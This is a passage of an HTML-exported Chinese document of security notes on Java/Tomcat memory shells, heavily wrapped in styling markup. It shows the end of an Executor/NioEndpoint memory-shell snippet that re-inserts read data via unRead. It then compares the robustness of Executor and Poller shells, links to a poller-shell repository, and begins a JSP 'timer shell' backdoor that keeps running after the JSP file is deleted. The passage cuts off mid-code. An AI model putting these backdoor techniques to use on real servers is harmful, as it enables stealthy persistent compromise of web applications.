style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> read</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> readBuffer</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">position</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> attachment</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">unRead</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">readBuffer</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">super</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">processKey</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">sk</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> attachment</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">缺点：Processor组件对socket处理之前我们就已进⾏过⼀次read，后续的处理 逻辑势必⽆法再次获取已读取过的request数据</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">解决方案：NioSocketWrapper⽗类SocketWrapperBase中，有⼀个⽅法名为 unRead，将已读取过的read数据重新放回socket</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">缺点：tomcat8.5.0以后，在tomcat封装的socket⽀持unread的数据回写，8.5.0以下不能使用</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">改进方式：Socket毒化</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://zhuanlan.zhihu.com/p/562616365" target="_blank">https://zhuanlan.zhihu.com/p/562616365</a></span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">poller内存马：</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://github.com/Kyo-w/trojan-eye" target="_blank">https://github.com/Kyo-w/trojan-eye</a></span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">executor和poller内存马对比：</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">Executor鲁棒性比Poller好。原因很简单，Poller是全局唯一的线程(tomcat8、9/springboot)，如果线程处理逻辑的时候出现不可预测的异常，线程就会终止，一旦线程终止，整个tomcat的服务直接崩溃，因为缺少了接收与创建任务的执行线程。这也就是说注入Poller的内存马一定是不能出任何bug的，一旦出了，整个服务直接崩溃。在起初做试验时，经常因为木马报错，导致整个服务不能访问，只能重启服务解决，所以风险很高！反向，Executor是一个任务类，创建后就执行一个线程任务，如果这次业务异常，最多这次的请求无法正常执行罢了</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Calibri;">timer内存马（2014）</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">一个 jsp 后门，这个 jsp 创建了一个 Timer 计时器对象，然后使用 </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="">schedule</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;"> 方法创建了一个 TimerTask 对象，也就是说创建了一个定时任务，每隔 1000 ms，就执行一次 </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="">java.util.TimerTask#run</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;"> 方法里面的逻辑。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">也就是说，在访问了一次这个 jsp 后，会启动一个计时器进行无限循环，一次执行直到服务器重启。即使将这个 jsp 删除，依旧是会继续进行这个任务</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'AttributeTok';color: #7D9029;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> page </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">="java</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">io</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">IOException" %></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'AttributeTok';color: #7D9029;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> page contentType</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"text/html;charset=UTF-8"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> language</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"java"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">%></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><%</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">  </span>out</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">println</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"timer jsp shell"</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">  </span>java</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">util</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">Timer</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> executeSchedule </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> java</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">util</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">Timer</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">  </span>executeSchedule</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">schedule</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> java</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">util</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">TimerTask</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">run</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:timer内存马2014）;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 